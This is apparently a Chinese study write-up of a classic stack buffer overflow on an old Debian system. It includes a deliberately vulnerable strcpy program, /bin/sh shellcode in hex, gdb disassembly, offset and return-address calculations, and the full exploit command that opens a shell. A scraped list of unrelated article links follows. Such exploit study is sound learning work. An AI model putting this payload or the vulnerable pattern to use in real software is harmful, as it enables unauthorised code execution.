yrx0619
yrx0619

黑客攻防技术宝典 系统篇(利用漏洞获得根特权)

0x01 环境信息

OS:Debian3r4

GDB:GNU gdb 6.3-debian

GCC:gcc version 3.3.5 (Debian 1:3.3.5-13)

0x02 代码

shellcode:需要注入到程序中的代码指令

"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"

victim.c

int main(int argc,char *argv[])
{
    char little_array[512];
    if (argc > 1)
        strcpy(little_array,argv[1]);
    printf("str:%s\n", little_array);
}

0x03 流程

要执行注入的程序,就改变代码执行的流程,和前面文章讲的,可以通过栈溢出来覆盖返回地址,从而达到跳转到指定地址执行已经输入的代码指令。

简化的流程可以用图做如下表示:

黑客攻防技术宝典 系统篇(利用漏洞获得根特权)_第1张图片

所以要执行shellcode最重要的两个步骤就是

  1. 覆盖返回指令地址
  2. 恶意指令的起始地址

只要做到了这两点就可以成功执行shellcode

根据0x02中的代码,来尝试执行shellcode,下面是我的结果,当把指令输入进去之后成功跳转到了shellcode里去执行。

黑客攻防技术宝典 系统篇(利用漏洞获得根特权)_第2张图片

0x04 调试

yerx@debian:~$ gdb --args ./victim $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\x30\xf7\xff\xbf")
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) disassemble main
Dump of assembler code for function main:
0x080483c4 :    push   %ebp
0x080483c5 :    mov    %esp,%ebp
0x080483c7 :    sub    $0x218,%esp
0x080483cd :    and    $0xfffffff0,%esp
0x080483d0 :   mov    $0x0,%eax
0x080483d5 :   sub    %eax,%esp
0x080483d7 :   cmpl   $0x1,0x8(%ebp)
0x080483db :   jle    0x80483f7 
0x080483dd :   mov    0xc(%ebp),%eax
0x080483e0 :   add    $0x4,%eax
0x080483e3 :   mov    (%eax),%eax
0x080483e5 :   mov    %eax,0x4(%esp)
0x080483e9 :   lea    0xfffffdf8(%ebp),%eax
0x080483ef :   mov    %eax,(%esp)
0x080483f2 :   call   0x80482e8 <_init+72>
0x080483f7 :   lea    0xfffffdf8(%ebp),%eax
0x080483fd :   mov    %eax,0x4(%esp)
0x08048401 :   movl   $0x8048524,(%esp)
0x08048408 :   call   0x80482d8 <_init+56>
0x0804840d :   leave
0x0804840e :   ret
0x0804840f :   nop
End of assembler dump.
(gdb)

先看一下gdb反汇编的到的main函数的汇编代码,通过测试输入不同的长度的字符串直到出现栈溢出,就可以找到为数组分配的空间大小,因为涉及到字节对其所以可能并不是512个字节,这里输入了524个字符出现了栈溢出,通过分析

0x080483f7这条指令也可以看出,为数组分配了0x208个字节的空间,保存数组内容。所以524个字节必然覆盖ebp,所以我们可以使用524个字节进行填充字符,然后再用4个字节指定为我们shellcode指令地址的开头,这里就是输入字符的起始地址,就是ebp - 0x208这个地址,所以的出我们的输入值是

\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\x30\xf7\xff\xbf

前40个字节为shellcode指令,中间%0484x为填充字符,\x30\xf7\xff\xbf为返回指令的地址(可能有不同)。

0x05提取步骤

  1. 先确定栈溢出需要输入的字符长度,通过分析知道是524个字节。

  2. shellcode是40个字节,所以需要填充484个字节,然后还需要4个字节覆盖返回地址。

  3. 查找main函数的ebp地址,找到shellcode的起始地址。

    通过如下函数找到起始的ebp的地址:

    unsigned long find_start(void)
{
    __asm__("movl %esp, %eax");
}

int main()
{
    printf("0x%x\n", find_start());
}

    得到0xbffffb38,shellcode肯定比这个ebp的地址要低,所以先任意找一个小于0xbffffb38的地址,比如:0xbffff948。

    使用如下命令:

    yerx@debian:~$ gdb --args ./victim $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\x48\xf9\xff\xbf")

    设置断点 b *0x0804841e

    (gdb) disassemble main
Dump of assembler code for function main:
0x080483f9 :    push   %ebp
0x080483fa :    mov    %esp,%ebp
0x080483fc :    sub    $0x218,%esp
0x08048402 :    and    $0xfffffff0,%esp
0x08048405 :   mov    $0x0,%eax
0x0804840a :   sub    %eax,%esp
0x0804840c :   cmpl   $0x1,0x8(%ebp)
0x08048410 :   jle    0x804842c 
0x08048412 :   mov    0xc(%ebp),%eax
0x08048415 :   add    $0x4,%eax
0x08048418 :   mov    (%eax),%eax
0x0804841a :   mov    %eax,0x4(%esp)
0x0804841e :   lea    0xfffffdf8(%ebp),%eax
0x08048424 :   mov    %eax,(%esp)
0x08048427 :   call   0x80482e8 <_init+72>
0x0804842c :   leave
0x0804842d :   ret
End of assembler dump.
(gdb) b *0x0804841e
Breakpoint 1 at 0x804841e: file victim.c, line 14.

    确定main函数ebp

    (gdb) i r ebp
ebp            0xbffff938       0xbffff938

    确定shellcode起始地址

    0xbffff938 - 0x208 = 0xBFFFF730

    修改输入参数,把跳转地址\x48\xf9\xff\xbf变为\x30\xf7\xff\xbf。成功执行了shellcode。如下所示:

    yerx@debian:~$ ./victim $(printf "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\x30\xf7\xff\xbf")
sh-2.05b$

参考

http://starlight.ink/2017/12/22/linux中aslr、栈保护、dep的开启与关闭/

你可能感兴趣的:(安全)

  • 【Docker】搭建 Docker 私有化仓库 cangloe dockerdocker容器运维
    搭建Docker私有化仓库是一个非常重要的实践,它能够帮助你安全地存储和管理Docker镜像,而无需将其发布到公共DockerHub。通过使用私有化仓库,你可以:提高安全性:镜像存储在受控的环境中。提升效率:在公司网络内传输镜像,速度更快。实现自动化:配合CI/CD系统实现自动镜像管理。本文将详细介绍如何在不同环境下搭建Docker私有化仓库,并提供配置和优化建议。一、Docker私有化仓库的基本
  • Java 阻塞队列(BlockingQueue)实战与原理详解 吴冰_hogan jucjava网络协议网络
    引言在多线程编程中,BlockingQueue是一种非常有用的同步工具,它不仅提供了线程安全的队列访问方式,还能够自动处理生产者和消费者之间的阻塞行为。本文将基于提供的文档内容,深入探讨BlockingQueue的工作原理及其在实际应用中的使用方法,并详细介绍几种常见的BlockingQueue实现。一、阻塞队列基础1.1定义与特性BlockingQueue是一个接口,定义了支持阻塞插入和移除操作
  • 使用Docker和Nginx轻松配置Let's Encrypt免费SSL证书 侯深业Dorian
    使用Docker和Nginx轻松配置Let'sEncrypt免费SSL证书去发现同类优质开源项目:https://gitcode.com/在数字化的今天,网站的安全性已成为每个在线业务的基础。Let'sEncrypt提供了免费的SSL证书,使得网站能够启用HTTPS,确保数据传输的安全。这篇项目文章将引导你通过Docker和Nginx,轻松实现Let'sEncryptSSL证书的自动配置。1、项目
  • 网络安全攻防实战:从基础防护到高级对抗 一ge科研小菜鸡 运维网络
    个人主页:一ge科研小菜鸡-CSDN博客期待您的关注引言在信息化时代,网络安全已经成为企业、政府和个人必须重视的问题。从数据泄露到勒索软件攻击,每一次安全漏洞都可能造成巨大的经济损失和隐私风险。本教程将通过详细的案例、代码示例和实用工具,帮助读者从基础安全防护到高级安全对抗,系统掌握网络安全攻防的核心技术。1.常见网络攻击方式与防御措施1.1SQL注入攻击攻击者在输入字段中插入恶意SQL代码,绕过
  • 谈谈信息安全治理模型 SOA开发者 安全web安全网络
    当我们学习ISO/SAE21434标准的时候,会看到网络安全治理(Cybersecuritygovernment)和网络安全管理(Cybersecuritymanagement)两个概念。然而该标准中并没有给出安全治理和安全管理的十分清晰的定义和描述。即使在安全社区内,似乎也是讲安全管理的多,讲安全治理的少。那到底两个概念是什么?两者的区别和联系又是什么呢?笔者通过调研发现安全治理、安全管理和安全
  • 如何安全发布 CompletableFuture ?Java9新增方法分析 java
    如何安全发布CompletableFuture?Java9新增方法分析本文未经允许禁止转载。JDK9中对于CompletableFuture做了新的增强,除了超时功能(orTimeout),还有面向继承、安全发布等相关方法。本文中,我们将详细分析各个新增方法,同时说明其安全发布的重要性,最后提出相关的实践原则。1.newIncompleteFuturepublicCompletableFuture
  • 谈谈SOA面向服务体系架构的安全问题 axnjynnq782831
    谈谈SOA面向服务体系架构的安全问题本文我们讨论的是面向服务体系架构(SOA)的安全应用。在展开讨论之前,首先让我们来解析面向服务体系架构的实际含义。面向服务体系架构是一种涉及若干以服务为导向的应用软件的体系架构。最初面向服务体系架构中的服务与一系列技术相关,包括SOAP,WSDL和UDDI。不过许多研发人员对REST(表象化状态转变,简称REST)服务显示出更大的兴趣,由此REST成为面向服务体
  • 企业级SOA的信息安全保证 Juishl soa网络xml加密security通讯
    毋庸讳言,“安全”是当前信息技术应用领域热门话题之一,无论是操作系统,还是应用软件,安全总是作为一项重要考量,特别是在商业应用领域,信息安全是业务运作的基本要求之一。企业级SOA在提供价值链上企业之间信息共享和业务流程自动化的同时,也对信息安全提出新的挑战。基于企业级SOA更加容易实现跨越企业边界的业务系统自动化和信息共享,开放的数据访问和网络服务调用给商业运作带来便利,同时也更加容易受到攻击,如
  • 5个实用的IP地址查询网站 ivwdcwso 运维tcp/ip网络协议网络
    在当今互联网时代,了解自己或他人的IP地址及相关信息变得越来越重要。无论是网络故障排查、安全分析,还是地理位置服务,IP地址信息都扮演着关键角色。本文将为您介绍5个实用的IP地址查询网站,帮助您快速获取所需的网络信息。1.ipinfo.ioipinfo.io是一个功能强大的IP地址信息查询平台。它提供以下特点:全面的IP信息:包括地理位置、ISP(互联网服务提供商)、ASN(自治系统号)等。灵活的
  • 关于断网事件的海底光缆脆弱性问题探讨 purpleforest 网络安全网络工作数据备份verizon电信互联网
    本文发表于《信息网络安全》2007.2,欢迎转载,请注明作者和期刊名。关于断网事件的海底光缆脆弱性问题探讨张鉴国家信息中心网络安全部一、引言2006年12月26日晚27日凌晨,在距中国台湾南部约15公里的海域处,连续发生两次7级左右的强烈地震。铺设在该区域附近的中美海缆、亚太1号海缆、亚太2号海缆、FLAG海缆、亚欧海缆、FNAL海缆等多条国际海底通信光缆,在强烈地震下发生断裂。此次海缆断裂中,中
  • 网页中间件安全加固 jasonwgz 中间件安全tomcat
    一、APACHEWEB服务器软件,apache的程序名是httpd,服务的控制:systemctlstart/stop/statushttpdApache是一个静态网站程序,不能直接支持动态页面;若要支持动态页面,则需要整合其它程序,如要支持PHP动态页面:yuminstallphp-fpmphp-commonphp-develphp-mysqlndphp-mbstringphp-mcrypt安装
  • Java Stream API中的状态性操作与陷阱 2501_90323865 javapython开发语言个人开发
    在Java编程中,StreamAPI为我们提供了一种高效且简洁的方式来处理集合数据。然而,在使用StreamAPI时,开发者常常会遇到状态性(stateful)操作和行为参数的问题。这些问题如果不加以注意,可能会导致代码的非确定性结果,甚至引发线程安全问题。本文将详细介绍状态性操作的原理、潜在问题以及如何避免这些问题,同时结合实例进行说明。一、状态性操作与无状态操作在StreamAPI中,操作可以
  • 「译」2024 年的 5 个 JavaScript 安全最佳实践 泯泷 浏览器前端安全javascript安全开发语言
    链接:https://thenewstack.io/5-javascript-security-best-practices-for-2024/作者:AlexanderT.Williams原标题:5JavaScriptSecurityBestPracticesfor2024网络安全已成为一个瞬息万变的战场,JavaScript应用程序的安全性也不例外。Web应用程序已成为黑客试图获取敏感数据和财务
  • JAVA面试题目整理 qq~374327792 javajava
    JAVA基础JAVA中的几种基本数据类型是什么,各自占用多少字节。String类能被继承吗,为什么。String,Stringbuffer,StringBuilder的区别。ArrayList和LinkedList有什么区别。讲讲类的实例化顺序,比如父类静态数据,构造函数,字段,子类静态数据,构造函数,字段,当new的时候,他们的执行顺序。用过哪些Map类,都有什么区别,HashMap是线程安全的
  • 18、智能驾驶芯片外部接口要求 OEM的牛马DRE 智能驾驶控制器硬件介绍人工智能
    针对提出的关于产品关键芯片及硬件安全模块的技术保障要求:(1)产品的关键芯片应采取安全访问控制技术保障芯片的对外接口安全,保障系统不被非授权的进入为保障芯片的对外接口安全,防止系统被非授权进入,可以采取以下安全访问控制技术:访问控制保护:通过限制对芯片的访问权限来保护芯片的安全性。一种常见的访问控制方法是使用存储在芯片内部的安全密钥或密码来限制对芯片的访问。只有具有正确密钥或密码的用户才能访问芯片
  • 深入理解Java中的泛型编程 egzosn java开发语言
    深入理解Java中的泛型编程大家好,我是微赚淘客系统3.0的小编,也是冬天不穿秋裤,天冷也要风度的程序猿!1.泛型的基础概念在Java中,泛型编程是一种强大的编程范式,它允许我们编写可以操作各种类型的代码,而不必在每次使用时重复编写代码。泛型提供了类型安全性和代码重用的机制。1.1定义泛型类和方法登录后复制packagecn.juwatech.generics;publicclassBox{pri
  • 《企业网络安全架构与实战指南:从蓝队防御到零信任网络部署》 Yimuzhizi 网络安全web安全安全网络安全人工智能架构网络搜索引擎
    项目:《企业网络安全架构与实战指南:从蓝队防御到零信任网络部署》姓名:飞花似梦Flydream日期:2024年11月21日目录蓝队基础企业网络架构高层管理IT管理中央技术团队安全部门企业管理技术信息安全管理成熟度模型(ISM3)安全职能安全团队成员典型企业网络分区模糊的边界外部攻击面身份管理识别Windows典型应用识别Linux典型应用识别WEB服务识别客户端设备身份和访问管理目录服务企业数据存
  • solidity基础 -- 可视范围 第十六年盛夏. Solidity区块链搭建和维护智能合约区块链智能合约
    在Solidity编程语言中,可视范围(Visibility)用于控制合约中变量和函数的访问权限。这对于确保合约的安全性、模块化以及代码的可维护性至关重要。Solidity提供了四种可视范围修饰符:public、private、external和internal。以下将结合给定代码进行详细介绍。注意:使用继承时请确保代码的正确性,以防丢失个人财产,在这里友情提示您,不要复制来源不明的solidit
  • 数据库用户管理 比特知识工坊 MySQL专栏数据库adbandroid
    数据库用户管理1.创建用户MySQL在安装是,会默认创建一个名位root的用户,该用户拥有超级权限,可以控制整个MySQL服务器。在对MySQL的日常管理和操作中,通常创建一些具有适当权限的用户,尽可能的不用或少用root登录系统,以此来确保数据的安全访问。可以使用createuse语句创建用户,并设置相应密码:createuser用户[indentifiedby[password]'passwo
  • Python FastAPI 多参数传递 大数据东哥(Aidon) pythonfastapipythonfastapi参数传递FastAPI参数传递路径/POST/GET参数传递
    PythonFastAPI请求参数传递FastAPI多参数传递类型FastAPI通过模板来匹配URL中的参数列表,大致有如下三类方式传递参数:路径参数传递:获取自定义的构造URL中的参数GET参数传递:获取一个URL后面带的?param1=1¶m2=2这种类型参数POST参数传递:获取POST请求中的参数,因为POST是加密的,因此更加安全,但有额外开销,测试API使用额外工具或插件或者自
  • 数据库物理备份:保障数据完整性和业务连续性的关键策略 qcidyu 数据库
    title:数据库物理备份:保障数据完整性和业务连续性的关键策略date:2025/1/29updated:2025/1/29author:cmdragonexcerpt:在现代企业中,数据被视为最重要的资产之一。因此,确保数据的安全性、完整性和可用性是每个数据库管理员(DBA)的首要任务。在数据管理的过程中,备份与恢复是必不可少的策略,尤其是物理备份。物理备份通过直接复制数据库的物理文件,从而实
  • 【SpringCloud微服务实战08】RabbitMQ 消息队列 李维山 MQ实战Javarabbitmqspringcloudspringboot
    MQ异步通信优缺点:优点:吞吐量提升:无需等待订阅者处理完成,响应更快速故障隔离:服务没有直接调用,不存在级联失败问题调用间没有阻塞,不会造成无效的资源占用耦合度极低,每个服务都可以灵活插拔,可替换流量削峰:不管发布事件的流量波动多大,都由Broker接收,订阅者可以按照自己的速度去处理事件缺点:架构复杂了,业务没有明显的流程线,不好管理需要依赖于Broker的可靠、安全、性能常见MQ对比:一、R
  • 留学生scratch计算机haskell函数ocaml编程ruby语言prolog作业VB matlabgoodboy ruby开发语言后端
    您列出了一系列编程语言和技术,这些可能是您在留学期间需要学习或完成作业的内容。以下是对每个项目的简要说明和它们可能涉及的领域或用途:Scratch:Scratch是一种图形化编程语言,专为儿童和初学者设计,用于教授编程基础概念。它通过拖拽代码块来创建程序,非常适合学习算法、逻辑和基本的编程概念。计算机(科学):这是一个广泛的领域,涉及计算机硬件、软件、算法、数据结构、网络安全等多个方面。留学生可能
  • 使用OpenSSL库接口,实现AES CBC加密,基于X509 base64编码证书的RSA非对称加密例子 GavinFj C语言相关工作学习总结算法数据安全
    RSA加密的填充方式安全不一样,RSA算法PKCS1填充方式没有OAEP填充方式安全;同样的AES选择CBC模式更加安全。网上看了好多例子,都没有使用X509base64编码证书的RSAOAEP填充方式加密。研究记录下RSA、AES的加密,以供参考。话不多说,直接上demo。/*************************************************************
  • prometheus 服务java服务接入基础镜像配置 窗外的寒风 prometheusjavapython
    环境变量设置:如果不经常修改配置,推荐在java镜像中把prometheus配置通过环境变量的方式统一配置,可以使用下面的参数,把端口进行暴漏(配置安全检查端口9998,启用所有安全检查接口,配置普罗米修斯的监测间隔,设置java服务名,把普罗米修斯的接口提升到根目录)ENVSPRING_APPLICATION_JSON='{"management.server.port":"9998","man
  • MySQL中的读锁与写锁:概念与作用深度剖析 恩爸编程 mysqlmysql数据库mysql读锁mysql写锁mysql中的读锁啥意思mysql中的写锁啥意思mysql锁机制
    MySQL中的读锁与写锁:概念与作用深度剖析在MySQL数据库的并发控制机制中,读锁和写锁起着至关重要的作用。它们是确保数据在多用户环境下能够正确、安全地被访问和修改的关键工具。一、读锁(共享锁)概念读锁,也称为共享锁(SharedLock),在MySQL中使用LOCKINSHAREMODE语句来实现。当一个事务对某一数据对象施加读锁时,允许其他事务同时对该数据对象进行读取操作,但不允许其他事务对
  • tomcat系统架构及运用 极致人生-010 tomcat系统架构java
    文章目录下面是Tomcat架构的详细解析:1.**Server(服务器)**2.**Service(服务)**3.**Container(容器)**-分层结构4.**Connectors(连接器)**5.**类加载器(ClassLoader)**6.**Catalina**7.**配置文件与目录结构**8.**监听器(Listeners)**9.**安全性**10.**性能调优与监控**Tomca
  • MMOFPS架构方案 你一身傲骨怎能输 游戏框架架构
    设计一个大规模多人在线第一人称射击游戏(MMOFPS)的架构是一个复杂且具有挑战性的任务。这个架构需要考虑到高并发、低延迟、数据一致性、安全性和可扩展性等多个方面。以下是一个详细的MMOFPS架构方案,涵盖了客户端、服务器、数据库和网络通信等方面。架构概述客户端:负责渲染、用户输入、动画和本地物理计算。服务器:负责游戏逻辑、状态同步、玩家匹配和数据存储。数据库:存储玩家数据、游戏状态和日志。网络通
  • C++程序-多行字符输入并判断类别(安全密码问题) huangxl1991 C++程序设计
    判断键盘输入是否安全密码-char[]类/*题目:安全密码要求:一般来说一个比较安全的密码至少应该满足下面两个条件:(1).密码长度大于等于8,且不要超过16。(2).密码中的字符应该来自下面“字符类别”中四组中的至少三组。这四个字符类别分别为:1.大写字母:A,B,C...Z;2.小写字母:a,b,c...z;3.数字:0,1,2...9;4.特殊符号:~,!,@,#,$,%,^(除以上三类均认
  • kotlin扩展函数!啃下这些Framework技术笔记,醍醐灌顶!_kotlin framework features 2401_89694162 笔记
    前言选了开发这一行,就意味着想混得好就要持续学习,你的技术和薪资、位置直接挂钩,进步对于程序员的重要性就不赘述了,接下来作为过来人,为广大同行分享一些学习干货,希望可以帮到大家什么是HTTPS?HTTPS(基于安全套接字层的超文本传输协议或者是HTTPoverSSL)是一个Netscape开发的Web协议。你也可以说:HTTPS=HTTP+SSLHTTPS在HTTP应用层的基础上使用安全套接字层作
  • jQuery 键盘事件keydown ,keypress ,keyup介绍 107x jsjquerykeydownkeypresskeyup
    本文章总结了下些关于jQuery 键盘事件keydown ,keypress ,keyup介绍,有需要了解的朋友可参考。 一、首先需要知道的是: 1、keydown() keydown事件会在键盘按下时触发. 2、keyup()  代码如下 复制代码 $('input').keyup(funciton(){      
  • AngularJS中的Promise bijian1013 JavaScriptAngularJSPromise
    一.Promise         Promise是一个接口,它用来处理的对象具有这样的特点:在未来某一时刻(主要是异步调用)会从服务端返回或者被填充属性。其核心是,promise是一个带有then()函数的对象。         为了展示它的优点,下面来看一个例子,其中需要获取用户当前的配置文件: var cu
  • c++ 用数组实现栈类 CrazyMizzz 数据结构C++
    #include<iostream> #include<cassert> using namespace std; template<class T, int SIZE = 50> class Stack{ private: T list[SIZE];//数组存放栈的元素 int top;//栈顶位置 public: Stack(
  • java和c语言的雷同 麦田的设计者 java递归scaner
    软件启动时的初始化代码,加载用户信息2015年5月27号 从头学java二 1、语言的三种基本结构:顺序、选择、循环。废话不多说,需要指出一下几点:      a、return语句的功能除了作为函数返回值以外,还起到结束本函数的功能,return后的语句 不会再继续执行。      b、for循环相比于whi
  • LINUX环境并发服务器的三种实现模型 被触发 linux
    服务器设计技术有很多,按使用的协议来分有TCP服务器和UDP服务器。按处理方式来分有循环服务器和并发服务器。 1  循环服务器与并发服务器模型 在网络程序里面,一般来说都是许多客户对应一个服务器,为了处理客户的请求,对服务端的程序就提出了特殊的要求。 目前最常用的服务器模型有: ·循环服务器:服务器在同一时刻只能响应一个客户端的请求 ·并发服务器:服
  • Oracle数据库查询指令 肆无忌惮_ oracle数据库
    20140920   单表查询 -- 查询************************************************************************************************************ -- 使用scott用户登录   -- 查看emp表   desc emp  
  • ext右下角浮动窗口 知了ing JavaScriptext
    第一种 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/
  • 浅谈REDIS数据库的键值设计 矮蛋蛋 redis
    http://www.cnblogs.com/aidandan/ 原文地址:http://www.hoterran.info/redis_kv_design 丰富的数据结构使得redis的设计非常的有趣。不像关系型数据库那样,DEV和DBA需要深度沟通,review每行sql语句,也不像memcached那样,不需要DBA的参与。redis的DBA需要熟悉数据结构,并能了解使用场景。
  • maven编译可执行jar包 alleni123 maven
    http://stackoverflow.com/questions/574594/how-can-i-create-an-executable-jar-with-dependencies-using-maven <build> <plugins> <plugin> <artifactId>maven-asse
  • 人力资源在现代企业中的作用 百合不是茶 HR 企业管理
    //人力资源在在企业中的作用人力资源为什么会存在,人力资源究竟是干什么的 人力资源管理是对管理模式一次大的创新,人力资源兴起的原因有以下点: 工业时代的国际化竞争,现代市场的风险管控等等。所以人力资源 在现代经济竞争中的优势明显的存在,人力资源在集团类公司中存在着 明显的优势(鸿海集团),有一次笔者亲自去体验过红海集团的招聘,只 知道人力资源是管理企业招聘的 当时我被招聘上了,当时给我们培训 的人
  • Linux自启动设置详解 bijian1013 linux
    linux有自己一套完整的启动体系,抓住了linux启动的脉络,linux的启动过程将不再神秘。 阅读之前建议先看一下附图。 本文中假设inittab中设置的init tree为: /etc/rc.d/rc0.d /etc/rc.d/rc1.d /etc/rc.d/rc2.d /etc/rc.d/rc3.d /etc/rc.d/rc4.d /etc/rc.d/rc5.d /etc
  • Spring Aop Schema实现 bijian1013 javaspringAOP
    本例使用的是Spring2.5 1.Aop配置文件spring-aop.xml <?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmln
  • 【Gson七】Gson预定义类型适配器 bit1129 gson
    Gson提供了丰富的预定义类型适配器,在对象和JSON串之间进行序列化和反序列化时,指定对象和字符串之间的转换方式,   DateTypeAdapter   public final class DateTypeAdapter extends TypeAdapter<Date> { public static final TypeAdapterFacto
  • 【Spark八十八】Spark Streaming累加器操作(updateStateByKey) bit1129 update
    在实时计算的实际应用中,有时除了需要关心一个时间间隔内的数据,有时还可能会对整个实时计算的所有时间间隔内产生的相关数据进行统计。 比如: 对Nginx的access.log实时监控请求404时,有时除了需要统计某个时间间隔内出现的次数,有时还需要统计一整天出现了多少次404,也就是说404监控横跨多个时间间隔。   Spark Streaming的解决方案是累加器,工作原理是,定义
  • linux系统下通过shell脚本快速找到哪个进程在写文件 ronin47
    一个文件正在被进程写 我想查看这个进程 文件一直在增大 找不到谁在写 使用lsof也没找到 这个问题挺有普遍性的,解决方法应该很多,这里我给大家提个比较直观的方法。 linux下每个文件都会在某个块设备上存放,当然也都有相应的inode, 那么透过vfs.write我们就可以知道谁在不停的写入特定的设备上的inode。 幸运的是systemtap的安装包里带了inodewatch.stp,位
  • java-两种方法求第一个最长的可重复子串 bylijinnan java算法
    import java.util.Arrays; import java.util.Collections; import java.util.List; public class MaxPrefix { public static void main(String[] args) { String str="abbdabcdabcx";
  • Netty源码学习-ServerBootstrap启动及事件处理过程 bylijinnan javanetty
    Netty是采用了Reactor模式的多线程版本,建议先看下面这篇文章了解一下Reactor模式: http://bylijinnan.iteye.com/blog/1992325 Netty的启动及事件处理的流程,基本上是按照上面这篇文章来走的 文章里面提到的操作,每一步都能在Netty里面找到对应的代码 其中Reactor里面的Acceptor就对应Netty的ServerBo
  • servelt filter listener 的生命周期 cngolon filterlistenerservelt生命周期
    1. servlet    当第一次请求一个servlet资源时,servlet容器创建这个servlet实例,并调用他的 init(ServletConfig config)做一些初始化的工作,然后调用它的service方法处理请求。当第二次请求这个servlet资源时,servlet容器就不在创建实例,而是直接调用它的service方法处理请求,也就是说
  • jmpopups获取input元素值 ctrain JavaScript
    jmpopups 获取弹出层form表单 首先,我有一个div,里面包含了一个表单,默认是隐藏的,使用jmpopups时,会弹出这个隐藏的div,其实jmpopups是将我们的代码生成一份拷贝。 当我直接获取这个form表单中的文本框时,使用方法:$('#form input[name=test1]').val();这样是获取不到的。 我们必须到jmpopups生成的代码中去查找这个值,$(
  • vi查找替换命令详解 daizj linux正则表达式替换查找vim
    一、查找 查找命令 /pattern<Enter> :向下查找pattern匹配字符串 ?pattern<Enter>:向上查找pattern匹配字符串 使用了查找命令之后,使用如下两个键快速查找: n:按照同一方向继续查找 N:按照反方向查找 字符串匹配 pattern是需要匹配的字符串,例如: 1:  /abc<En
  • 对网站中的js,css文件进行打包 dcj3sjt126com PHP打包
    一,为什么要用smarty进行打包 apache中也有给js,css这样的静态文件进行打包压缩的模块,但是本文所说的不是以这种方式进行的打包,而是和smarty结合的方式来把网站中的js,css文件进行打包。 为什么要进行打包呢,主要目的是为了合理的管理自己的代码 。现在有好多网站,你查看一下网站的源码的话,你会发现网站的头部有大量的JS文件和CSS文件,网站的尾部也有可能有大量的J
  • php Yii: 出现undefined offset 或者 undefined index解决方案 dcj3sjt126com undefined
    在开发Yii 时,在程序中定义了如下方式:        if($this->menuoption[2] === 'test'),那么在运行程序时会报:undefined offset:2,这样的错误主要是由于php.ini 里的错误等级太高了,在windows下错误等级
  • linux 文件格式(1) sed工具 eksliang linuxlinux sed工具sed工具linux sed详解
    转载请出自出处: http://eksliang.iteye.com/blog/2106082 简介       sed 是一种在线编辑器,它一次处理一行内容。处理时,把当前处理的行存储在临时缓冲区中,称为“模式空间”(pattern space),接着用sed命令处理缓冲区中的内容,处理完成后,把缓冲区的内容送往屏幕。接着处理下一行,这样不断重复,直到文件末尾
  • Android应用程序获取系统权限 gqdy365 android
    引用 如何使Android应用程序获取系统权限         第一个方法简单点,不过需要在Android系统源码的环境下用make来编译:         1. 在应用程序的AndroidManifest.xml中的manifest节点
  • HoverTree开发日志之验证码 hvt .netC#asp.nethovertreewebform
    HoverTree是一个ASP.NET的开源CMS,目前包含文章系统,图库和留言板功能。代码完全开放,文章内容页生成了静态的HTM页面,留言板提供留言审核功能,文章可以发布HTML源代码,图片上传同时生成高品质缩略图。推出之后得到许多网友的支持,再此表示感谢!留言板不断收到许多有益留言,但同时也有不少广告,因此决定在提交留言页面增加验证码功能。ASP.NET验证码在网上找,如果不是很多,就是特别多
  • JSON API:用 JSON 构建 API 的标准指南中文版 justjavac json
    译文地址:https://github.com/justjavac/json-api-zh_CN 如果你和你的团队曾经争论过使用什么方式构建合理 JSON 响应格式, 那么 JSON API 就是你的 anti-bikeshedding 武器。 通过遵循共同的约定,可以提高开发效率,利用更普遍的工具,可以是你更加专注于开发重点:你的程序。 基于 JSON API 的客户端还能够充分利用缓存,
  • 数据结构随记_2 lx.asymmetric 数据结构笔记
    第三章 栈与队列 一.简答题 1. 在一个循环队列中,队首指针指向队首元素的  前一个    位置。  2.在具有n个单元的循环队列中,队满时共有  n-1  个元素。  3. 向栈中压入元素的操作是先  移动栈顶指针&n
  • Linux下的监控工具dstat 网络接口 linux
    1) 工具说明dstat是一个用来替换 vmstat,iostat netstat,nfsstat和ifstat这些命令的工具, 是一个全能系统信息统计工具. 与sysstat相比, dstat拥有一个彩色的界面, 在手动观察性能状况时, 数据比较显眼容易观察; 而且dstat支持即时刷新, 譬如输入dstat 3, 即每三秒收集一次, 但最新的数据都会每秒刷新显示. 和sysstat相同的是,
  • C 语言初级入门--二维数组和指针 1140566087 二维数组c/c++指针
    /* 二维数组的定义和二维数组元素的引用 二维数组的定义: 当数组中的每个元素带有两个下标时,称这样的数组为二维数组; (逻辑上把数组看成一个具有行和列的表格或一个矩阵); 语法: 类型名 数组名[常量表达式1][常量表达式2] 二维数组的引用: 引用二维数组元素时必须带有两个下标,引用形式如下: 例如: int a[3][4];  引用:
  • 10点睛Spring4.1-Application Event wiselyman application
